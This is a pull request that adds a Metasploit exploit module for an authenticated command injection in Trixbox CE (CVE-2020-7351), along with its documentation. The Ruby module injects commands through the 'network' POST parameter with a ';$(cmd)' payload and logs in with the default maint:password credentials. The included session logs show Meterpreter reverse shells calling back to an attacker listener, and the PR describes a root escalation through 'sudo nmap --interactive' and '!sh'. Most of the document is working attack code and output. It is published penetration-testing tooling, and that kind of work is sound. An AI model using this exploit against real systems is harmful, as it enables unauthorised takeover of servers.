### PR TITLE
Trixbox CE v2.8.0.4 endpoint_devicemap.php Authenticated Remote Command Execution

### DIFF
--- a/documentation/modules/exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce.md
+++ b/documentation/modules/exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce.md
@@ -1,0 +1,264 @@
+## Vulnerable Application
+
+### Description
+
+  This module exploits an authenticated OS command injection
+  vulnerability found in Trixbox CE version 1.2.0 to 2.8.0.4
+  inclusive in the "network" POST parameter of the
+  "/maint/modules/endpointcfg/endpoint_devicemap.php" page.
+  Successful exploitation allows for arbitrary command execution
+  on the underlying operating system as the "asterisk" user.
+  Users can easily elevate their privileges to the "root" user
+  however by executing "sudo nmap --interactive" followed by "!sh"
+  from within nmap.
+
+### Installation And Setup
+
+  1. Download the latest version of Trixbox CE (i.e. [v2.8.0.4 ISO](https://netcologne.dl.sourceforge.net/project/asteriskathome/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso)).
+  2. Set up a new CentOS machine in VirtualBox or VMWare and load the ISO. 
+  Be sure to disable any autosetup features of VMWare or VirtualBox. 
+  Follow the install prompts and note the `root` password you choose to use. 
+  Once `Package Installation` appears on the screen, wait for the system 
+  to finish rebooting several times, after which the following screen 
+  should be displayed:
+  ```
+  CentOS release 4.3 (Final)
+  Kernel 2.6.9-34.EL on an i686
+
+  asterisk1 login:
+  ```
+  3. Log into via the terminal using the username `root` and the password 
+  you set for the `root` user during installation.
+  4. A prompt similar to the following should be displayed:
+  ```
+  For access to the trixbox web GUI use this URL: http://192.168.205.144
+  ```
+  5. Once this prompt is displayed, take the IP address and browse 
+  to the URL http://*IP ADDRESS*/maint/, then log in with the default 
+  administrative credentials (`maint`:`password`).
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Scenarios
+
+### Trixbox CE v2.8.0.4
+```
+msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.8
+rhosts => 192.168.1.8
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options
+
+Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  password         yes       Password to login with
+   HttpUsername  maint            yes       User to login with
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.1.8      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT         80               yes       The target port (TCP)
+   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT       8080             yes       The local port to listen on.
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Linux Dropper)
+
+
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10
+lhost => 192.168.1.10
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.10:4444
+[*] 192.168.1.8:80 - Authenticating using "maint:password" credentials...
+[+] 192.168.1.8:80 - Authenticated successfully.
+[+] 192.168.1.8:80 - Trixbox CE v2.8.0.4 identified.
+[*] 192.168.1.8:80 - Sending payload (150 bytes)...
+[*] Sending stage (980808 bytes) to 192.168.1.8
+[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.8:38680) at 2020-05-02 03:55:24 -0400
+[*] Command Stager progress - 100.00% done (799/799 bytes)
+
+meterpreter > sysinfo
+Computer     : trixbox1.localdomain
+OS           : CentOS 5.5 (Linux 2.6.18-164.11.1.el5)
+Architecture : i686
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > shell
+Process 9259 created.
+Channel 1 created.
+id
+uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
+whoami
+asterisk
+```
+
+### Trixbox CE v2.4.0
+```
+msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.7
+rhosts => 192.168.1.7
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options
+
+Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  password         yes       Password to login with
+   HttpUsername  maint            yes       User to login with
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.1.7      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT         80               yes       The target port (TCP)
+   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT       8080             yes       The local port to listen on.
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Linux Dropper)
+
+
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10
+lhost => 192.168.1.10
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.10:4444
+[*] 192.168.1.7:80 - Authenticating using "maint:password" credentials...
+[+] 192.168.1.7:80 - Authenticated successfully.
+[+] 192.168.1.7:80 - Trixbox CE v2.4.0 identified.
+[*] 192.168.1.7:80 - Sending payload (150 bytes)...
+[*] Sending stage (980808 bytes) to 192.168.1.7
+[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.7:4478) at 2020-05-02 03:52:53 -0400
+[*] Command Stager progress - 100.00% done (799/799 bytes)
+
+meterpreter > sysinfo
+Computer     : trixbox1.localdomain
+OS           : CentOS 5 (Linux 2.6.18-53.1.4.el5)
+Architecture : i686
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > shell
+Process 14144 created.
+Channel 1 created.
+id
+uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
+whoami
+asterisk
+```
+
+### Trixbox CE v1.2.0
+```
+msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce 
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options
+
+Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  password         yes       Password to login with
+   HttpUsername  maint            yes       User to login with
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT         80               yes       The target port (TCP)
+   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT       8080             yes       The local port to listen on.
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Linux Dropper)
+
+
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set LHOST 192.168.205.1
+LHOST => 192.168.205.1
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set SRVHOST 192.168.205.1
+SRVHOST => 192.168.205.1
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set RHOSTS 192.168.205.148
+RHOSTS => 192.168.205.148
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.205.1:4444 
+[*] 192.168.205.148:80 - Authenticating using "maint:password" credentials...
+[+] 192.168.205.148:80 - Authenticated successfully.
+[+] 192.168.205.148:80 - Trixbox CE v1.2.0 identified.
+[*] 192.168.205.148:80 - Sending payload (150 bytes)...
+[*] Sending stage (980808 bytes) to 192.168.205.148
+[*] Meterpreter session 1 opened (192.168.205.1:4444 -> 192.168.205.148:32775) at 2020-05-04 12:53:23 -0500
+[*] Command Stager progress - 100.00% done (799/799 bytes)
+
+meterpreter > sysinfo
+Computer     : asterisk1.local
+OS           : CentOS 4.4 (Linux 2.6.9-42.0.2.EL)
+Architecture : i686
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > shell
+Process 5678 created.
+Channel 1 created.
+id
+uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
+whoami
+asterisk
+```
+
+## Privilege Elevation Steps
+
+  Once a shell has been gained as the `asterisk` user, 
+  attackers can elevate their privileges to `root` by 
+  executing the following commands:
+
+```
+sudo nmap --interactive
+
+Starting Nmap V. 4.76 ( http://nmap.org )
+Welcome to Interactive Mode -- press h <enter> for help
+nmap> !sh
+id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+```
+

--- a/modules/exploits/unix/webapp/trixbox_ce_endpoint_devicemap_rce.rb
+++ b/modules/exploits/unix/webapp/trixbox_ce_endpoint_devicemap_rce.rb
@@ -1,0 +1,198 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'TrixBox CE endpoint_devicemap.php Authenticated Command Execution',
+        'Description' => %q{
+          This module exploits an authenticated OS command injection
+          vulnerability found in Trixbox CE version 1.2.0 to 2.8.0.4
+          inclusive in the "network" POST parameter of the
+          "/maint/modules/endpointcfg/endpoint_devicemap.php" page.
+          Successful exploitation allows for arbitrary command execution
+          on the underlying operating system as the "asterisk" user.
+          Users can easily elevate their privileges to the "root" user
+          however by executing "sudo nmap --interactive" followed by "!sh"
+          from within nmap.
+        },
+        'Author' => [
+          # Obrela Labs Team - Discovery and Metasploit module
+          'Anastasios Stasinopoulos (@ancst)'
+        ],
+        'References' => [
+          ['CVE', '2020-7351'],
+          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/13353'] # First ref is this module
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Payload' => { 'BadChars' => "\x00" },
+        'DisclosureDate' => 'Apr 28 2020',
+        'Targets' =>
+          [
+            [
+              'Automatic (Linux Dropper)',
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            ],
+            [
+              'Automatic (Unix In-Memory)',
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'Type' => :unix_memory
+            ]
+          ],
+        'Privileged' => false,
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'User to login with', 'maint']),
+        OptString.new('HttpPassword', [ true, 'Password to login with', 'password']),
+      ]
+    )
+  end
+
+  def user
+    datastore['HttpUsername']
+  end
+
+  def pass
+    datastore['HttpPassword']
+  end
+
+  def get_target(res)
+    version = res.body.scan(/v(\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
+    if version.nil?
+      version = res.body.scan(/Version: (\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
+      if version.nil?
+        print_error("#{peer} - Unable to grab version of Trixbox CE installed on target!")
+        return nil
+      end
+    end
+    print_good("#{peer} - Trixbox CE v#{version} identified.")
+    if Gem::Version.new(version).between?(Gem::Version.new('2.6.0.0'), Gem::Version.new('2.8.0.4'))
+      @uri = normalize_uri(target_uri.path, '/maint/modules/endpointcfg/endpoint_devicemap.php')
+    elsif Gem::Version.new(version).between?(Gem::Version.new('2.0.0.0'), Gem::Version.new('2.4.9.9'))
+      @uri = normalize_uri(target_uri.path, '/maint/modules/11_endpointcfg/endpoint_devicemap.php')
+    elsif Gem::Version.new(version).between?(Gem::Version.new('1.2.0.0'), Gem::Version.new('1.9.9.9'))
+      @uri = normalize_uri(target_uri.path, '/maint/endpoint_devicemap.php')
+    else
+      return nil
+    end
+    return version
+  end
+
+  def login(user, pass, _opts = {})
+    uri = normalize_uri(target_uri.path, '/maint/')
+    print_status("#{peer} - Authenticating using \"#{user}:#{pass}\" credentials...")
+    res = send_request_cgi({
+      'uri' => uri,
+      'method' => 'GET',
+      'authorization' => basic_auth(user, pass)
+    })
+    unless res
+      # We return nil here, as callers should handle this case
+      # specifically with their own unique error message.
+      return nil
+    end
+
+    if res.code == 200
+      print_good("#{peer} - Authenticated successfully.")
+    elsif res.code == 401
+      print_error("#{peer} - Authentication failed.")
+    else
+      print_error("#{peer} - The host responded with an unexpected status code: #{res.code}.")
+    end
+    return res
+  rescue ::Rex::ConnectionError
+    print_error('Caught a Rex::ConnectionError in login() method. Connection failed.')
+    return nil
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'authorization' => basic_auth(user, pass),
+      'vars_post' => {
+        'network' => ";$(#{cmd})"
+      }
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def check
+    res = login(user, pass)
+    unless res
+      print_error("No response was received from #{peer} whilst in check(), check it is online and the target port is open!")
+      return CheckCode::Detected
+    end
+    if res.code == 200
+      version = get_target(res)
+      if version.nil?
+        # We don't print out an error message here as returning this will
+        # automatically cause Metasploit to print out an appropriate error message.
+        return CheckCode::Safe
+      end
+
+      delay = rand(7...10)
+      cmd = "sleep #{delay}"
+      print_status("#{peer} - Verifying remote code execution by attempting to execute '#{cmd}'.")
+      t1 = Time.now.to_i
+      res = execute_command(cmd)
+      t2 = Time.now.to_i
+      unless res
+        print_error("#{peer} - Connection failed whilst trying to perform the command injection.")
+        return CheckCode::Detected
+      end
+      diff = t2 - t1
+      if diff >= delay
+        print_good("#{peer} - Response received after #{diff} seconds.")
+        return CheckCode::Vulnerable
+      else
+        print_error("#{peer} - Response wasn't received within the expected period of time.")
+        return CheckCode::Safe
+      end
+    end
+  rescue ::Rex::ConnectionError
+    print_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")
+    return CheckCode::Unknown
+  end
+
+  def exploit
+    res = login(user, pass)
+    unless res
+      print_error("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
+    end
+    if res.code == 200
+      version = get_target(res)
+      if version.nil?
+        print_error("#{peer} - The target is not vulnerable.")
+        return false
+      end
+      print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
+      case target['Type']
+      when :unix_memory
+        execute_command(payload.encoded)
+      when :linux_dropper
+        execute_cmdstager(linemax: 130_000)
+      end
+    end
+  rescue ::Rex::ConnectionError
+    print_error('Rex::ConnectionError caught in check(), could not connect to the target.')
+    return false
+  end
+end


### PR DESCRIPTION
This module exploits an authenticated OS command injection vulnerability found in TrixBox CE version 1.2.0 to 2.8.0.4 inclusive in the `network` POST parameter of the `/maint/modules/endpointcfg/endpoint_devicemap.php` page. Successful exploitation allows for arbitrary command execution on the underlying operating system as the `asterisk` user.

#### Example Usage
```
msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce
msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.8
rhosts => 192.168.1.8
msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options

Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  password         yes       Password to login with
   HttpUsername  maint            yes       User to login with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.1.8      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)


msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10
lhost => 192.168.1.10
msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.10:4444
[*] 192.168.1.8:80 - Authenticating using "maint:password" credentials...
[+] 192.168.1.8:80 - Authenticated successfully.
[+] 192.168.1.8:80 - Trixbox CE v2.8.0.4 identified.
[*] 192.168.1.8:80 - Sending payload (150 bytes)...
[*] Sending stage (980808 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.8:38680) at 2020-05-02 03:55:24 -0400
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > sysinfo
Computer     : trixbox1.localdomain
OS           : CentOS 5.5 (Linux 2.6.18-164.11.1.el5)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 9259 created.
Channel 1 created.
id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
whoami
asterisk
```

Once a shell has been gained as the `asterisk` user,  attackers can elevate their privileges to `root` by executing the following commands:
```
sudo nmap --interactive

Starting Nmap V. 4.76 ( http://nmap.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
```
